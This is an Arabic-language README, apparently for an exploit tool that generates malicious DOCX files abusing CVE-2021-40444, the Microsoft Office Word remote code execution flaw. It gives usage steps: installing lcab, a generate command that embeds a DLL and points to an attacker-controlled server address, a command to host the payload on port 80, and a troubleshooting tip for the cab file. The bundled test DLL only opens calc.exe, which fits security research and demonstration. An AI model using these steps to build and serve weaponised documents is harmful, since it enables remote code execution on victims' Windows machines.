
ينشئ ملفات DOCX ضارة تستغل CVE-2021-40444 لتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر مستندات Office مصممة، مع خادم استضافة مدمج لتسليم الحمولة.
مولّد مستندات docx خبيثة لاستغلال CVE-2021-40444 (تنفيذ التعليمات البرمجية عن بُعد في Microsoft Office Word)
يعتمد إنشاء هذا السكربت على بعض الهندسة العكسية للعينة المستخدمة في البرية: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (ملف docx)
يجب عليك تثبيت lcab أولاً (sudo apt-get install lcab)
راجع REPRODUCE.md لخطوات إعادة الإنتاج اليدوية
إذا لم يعمل ملف cab الذي تم إنشاؤه، فحاول توجيه عنوان URL الخاص بـ exploit.html إلى calc.cab
أولاً، قم بإنشاء مستند docx خبيث بالاستناد إلى ملف DLL، يمكنك استخدام الملف الموجود في test/calc.dll والذي يقوم فقط بتشغيل calc.exe عبر استدعاء system()
python3 exploit.py generate test/calc.dll http://<SRV IP>

بمجرد إنشاء ملف docx الخبيث (سيكون في out/) يمكنك إعداد الخادم:
sudo python3 exploit.py host 80

أخيرًا، جرّب ملف docx على جهاز افتراضي يعمل بنظام Windows:
